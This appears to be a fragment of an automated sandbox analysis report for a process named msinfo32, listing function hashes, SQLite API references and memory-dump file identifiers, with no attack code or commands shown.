                                                                                                              • Opcode ID: eb4b64345449c52faa6285ade345dfc1370a22bcbbadc1113bc0572dd90ef6c9
                                                                                                              • Instruction ID: a243291d74ca215f849f1592a16667964d39556e0a815016af301dbf9e8d9fa7
                                                                                                              • Opcode Fuzzy Hash: eb4b64345449c52faa6285ade345dfc1370a22bcbbadc1113bc0572dd90ef6c9
                                                                                                              • Instruction Fuzzy Hash: 1EF09E703086018BEB009A7E88C27127BC5F749344F68C83CE258CF354D735E8618750
                                                                                                              Function 61E37BCA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E37BD1
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18D2E
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E20D02), ref: 61E18D62
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E1903A
                                                                                                              • sqlite3_str_vappendf.SQLITE3 ref: 61E37C1C
                                                                                                                • Part of subcall function 61E20FC2: sqlite3_str_append.SQLITE3 ref: 61E21041
                                                                                                                • Part of subcall function 61E20FC2: sqlite3_str_append.SQLITE3 ref: 61E21078
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              • Associated: 0000000C.00000002.874598082.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874619896.0000000061E97000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874626124.0000000061E99000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874634821.0000000061EAB000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874641242.0000000061EAC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874647132.0000000061EAF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 0000000C.00000002.874658816.0000000061EB3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_str_append$sqlite3_configsqlite3_initializesqlite3_mutex_entersqlite3_mutex_leavesqlite3_str_vappendf
                                                                                                              • String ID: F
                                                                                                              • API String ID: 4014417345-1304234792
                                                                                                              • Opcode ID: bb0c18b266978050ec08bbd4c72955511cfd7fb5c7a66b71101673f10316819d
                                                                                                              • Instruction ID: bc2276aac57a7269adc28356c55cf18478cf3670b3a49d1a75a36147afd0f726
                                                                                                              • Opcode Fuzzy Hash: bb0c18b266978050ec08bbd4c72955511cfd7fb5c7a66b71101673f10316819d
                                                                                                              • Instruction Fuzzy Hash: 34F0F9B0D053898BDB40DFE8C59478EBBF4AB44358F20C429E8489F344E735D544CB42